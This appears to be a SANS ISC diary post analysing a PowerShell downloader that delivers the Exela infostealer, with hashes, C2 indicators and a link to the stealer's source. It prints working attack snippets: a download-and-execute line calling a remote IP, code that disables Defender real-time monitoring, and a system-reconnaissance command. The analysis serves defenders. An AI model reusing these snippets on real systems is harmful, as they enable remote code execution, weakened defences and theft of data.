ExelaStealer Delivered "From Russia With Love"

Published: 2024-07-26. Last Updated: 2024-07-26 11:51:44 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65):

$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add("X-Requested-With", "PowerShell")
$script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1")
Invoke-Expression $script

The file "open.ps1" is downloaded from Russia and contains comments in Russian like "Function of real-life security protection". It will try to disable the antivirus or, if not possible, it will ask the victim to do it!

// Decoded: "Press d when u turn off Tamper Protect!"
$ready = Read-Host 
([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("UHJlc3MgZCB3aGVuIHUgdHVybiBvZmYgVGFtcGVyIFByb3RlY3Qh")))

if ($ready -eq "d") {
    Try {
        Set-MpPreference -DisableRealtimeMonitoring $true
        Write-Host "1"
    }
    Catch {
       Write-Host "2"
    }
}
else {
    // Decoded: "Canceled!"
    Write-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q2FuY2VsZWQh")))
    exit
}

Then, the script tries to download two PE files:

  • cmd.exe (SHA256: 97d6e2d922c2f69cb84341b238966555820f0b46375a9e0e1a1a19a5f42a8f96)
  • service.exe (SHA256: de223760fd87d21d3548ab96e810f7c0c16aeea156905845d2e3c81e1e7df663)

"cmd.exe" is a self-extracting RAR archive:

remnux@remnux:MalwareZoo/20240726$ rar t cmd.exe 

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive cmd.exe

Testing     comCommon.exe                                             OK 
Testing     OejMizBn6qpQO.vbe                                         OK 
Testing     e0FFDTJuwoKvrdf9FE4ACLcGB7vDN5I0giWGmO2aDyI3QEuN.bat      OK 
All OK

It communicates with solararbx[.]online (37.140.192.207). At this time, I'm not sure about the purpose of the RAR archive.

"service.exe" is the Exela[1] stealer, developed in Python and compiled into a PE file. It uses Discord as C2 channel. Reconnaissance is performed via a simple script:

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

[1] https://github.com/quicaxd/Exela-V2.0

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Friday, July 26th, 2024 https://isc.sans.edu/podcastdetail/9070

Comments


Diary Archives